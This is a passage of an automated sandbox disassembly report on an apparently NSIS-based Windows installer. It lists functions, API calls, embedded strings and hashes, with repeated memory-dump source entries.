CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09

Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

Non-executed Functions

Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049BF
GetDlgItem.USER32(?,00000408), ref: 004049CC
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
LoadBitmapW.USER32(0000006E), ref: 00404A2E
SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
DeleteObject.GDI32(?), ref: 00404AA5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
ShowWindow.USER32(?,00000005), ref: 00404BFB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
ImageList_Destroy.COMCTL32(?), ref: 00404DC8
GlobalFree.KERNEL32(?), ref: 00404DD8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
ShowWindow.USER32(?,00000000), ref: 00404F75
GetDlgItem.USER32(?,000003FE), ref: 00404F80
ShowWindow.USER32(00000000), ref: 00404F87

Strings

N, xrefs: 00404C32
, xrefs: 00404F65
@, xrefs: 00404BBC
M, xrefs: 00404B6F

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58

Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
lstrlenW.KERNEL32(?), ref: 00406D58
FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
FindClose.KERNEL32(?), ref: 00406E5F

Strings

Delete: DeleteFile("%s"), xrefs: 00406DE8
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
Delete: DeleteFile failed("%s"), xrefs: 00406E29
\*.*, xrefs: 00406D2F
RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
ptF, xrefs: 00406D1A
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
API String ID: 2035342205-1650287579
Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 00404525
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
GetDlgItem.USER32(?,000003FB), ref: 00404553
GetAsyncKeyState.USER32(00000010), ref: 0040455A
GetDlgItem.USER32(?,000003F0), ref: 0040456F
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
SetWindowTextW.USER32(?,?), ref: 004045AF
SHBrowseForFolderW.SHELL32(?), ref: 00404669
lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
CoTaskMemFree.OLE32(00000000), ref: 00404674

Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB

GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,74DF23A0,00000000), ref: 00406902

SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819

Strings

A, xrefs: 00404662
F, xrefs: 004046A0

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: F$A
API String ID: 3347642858-1281894373
Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59

Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
lstrcmpA.KERNEL32(name,?), ref: 00406FF3
CloseHandle.KERNEL32(?), ref: 00407212

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

%s: failed opening file "%s", xrefs: 00406F38
GetTTFNameString, xrefs: 00406F33
name, xrefs: 00406FEB

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75

Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,74DF23A0,00000000), ref: 00406902
GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,74DF23A0,00000000), ref: 00406A73

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406A0B
F, xrefs: 00406A7F
F, xrefs: 00406858
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406952

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-1792361021
Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54

Function 004079A2 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95

Function 0040737E Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85

Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
lstrlenW.KERNEL32(?), ref: 004063F8
GetVersionExW.KERNEL32(?), ref: 00406456

Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
FreeLibrary.KERNEL32(00000000), ref: 00406500
GlobalFree.KERNEL32(?), ref: 00406509

Strings

Kernel32.DLL, xrefs: 004065C7
Module32NextW, xrefs: 0040660A
Module32FirstW, xrefs: 004065FF
Process32NextW, xrefs: 004065F4
PSAPI.DLL, xrefs: 00406490
Process32FirstW, xrefs: 004065E9
CreateToolhelp32Snapshot, xrefs: 004065E1
GetModuleBaseNameW, xrefs: 004064C0
EnumProcessModules, xrefs: 004064B6
Unknown, xrefs: 00406528
EnumProcesses, xrefs: 004064AE

Memory Dump Source

